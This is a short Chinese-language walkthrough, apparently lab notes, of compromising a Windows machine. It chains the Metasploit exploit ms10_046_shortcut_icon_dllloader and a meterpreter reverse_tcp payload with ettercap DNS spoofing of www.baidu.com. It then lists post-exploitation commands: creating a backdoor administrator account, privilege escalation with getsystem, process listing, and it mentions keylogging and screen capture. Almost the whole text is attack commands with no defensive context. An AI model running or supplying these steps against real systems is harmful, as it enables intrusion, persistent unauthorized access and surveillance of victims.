ms10_046_shortcut_icon_dllloader漏洞利用过程
- msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
- msf exploit(ms10_046_shortcut_icon_dllloader) > set PAYLOAD windows/meterpreter/reverse_tcp
- msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.107
- msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.107
- msf exploit(ms10_046_shortcut_icon_dllloader) > show options
-
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
ettercap dns欺骗
- root@bt:~# cd /usr/local/share/ettercap/
-
root@bt:/usr/local/share/ettercap# vim etter.dns //在最后一行添加需要欺骗的域名,如下图
- root@bt:/usr/local/share/ettercap# ettercap -T -q -i eth0 -P dns_spoof /192.168.1.102/ // //开始dns欺骗
利用结果显示
-
清空受害机器dns缓存:
-
受害主机访问www.baidu.com:
-
Ettcap终端显示:
-
漏洞利用终端显示:
漏洞利用成功,开始利用
- msf exploit(ms10_046_shortcut_icon_dllloader) > sessions //在漏洞利用终端输入,可以看到建立的会话
-
msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1 //进入会话
-
meterpreter > shell //进入cmd shell
-
拿到cmd shell后就可以对受害主机进行基本控制。如:
net user newuser password /add //添加用户
net localgroup administrators newuser /add //增加权限
exit //退出cmd,返回会话
-
meterpreter > ps //列出受害主机进程
-
meterpreter > getuid //查看我当前拥有的权限
-
meterpreter > getsystem //提权
-
meterpreter > help //查看其他命令,可以键盘捕获,截屏等等其他强大功能